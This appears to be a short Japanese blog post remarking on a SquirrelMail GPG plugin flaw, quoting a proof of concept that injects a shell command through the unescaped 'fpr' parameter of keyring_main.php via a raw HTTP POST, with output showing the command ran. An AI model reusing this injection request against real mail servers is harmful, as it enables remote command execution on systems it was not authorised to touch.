げげげ！！！SquirrelMailにおいて、HTTPリクエストでコマンド書いたら実行できちゃったみたいです。サンプル書くなよ！！！ｗ

There are various vulnerabilities in this software! One is in keyring_main.php!
$fpr is not escaped from shellcommands!

testbox:/home/w00t# cat /tmp/w00t
cat: /tmp/w00t: No such file or directory
testbox:/home/w00t#

@silverlaptop:~$ nc *** 80

POST /webmail/plugins/gpg/modules/keyring_main.php HTTP/1.1
Host: ***
User-Agent: w00t
Keep-Alive: 300
Connection: keep-alive
Cookie: Authentication Data for SquirrelMail
Content-Type: application/x-www-form-urlencoded
Content-Length: 140

id=C5B1611B8E71C***&fpr= | touch /tmp/w00t | &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&d
eletepair=false&trust=1

...

testbox:/home/w00t# cat /tmp/w00t
testbox:/home/w00t#

So we just executed 'touch /tmp/w00t'!

関連URL

• http://www.milw0rm.com/exploits/4173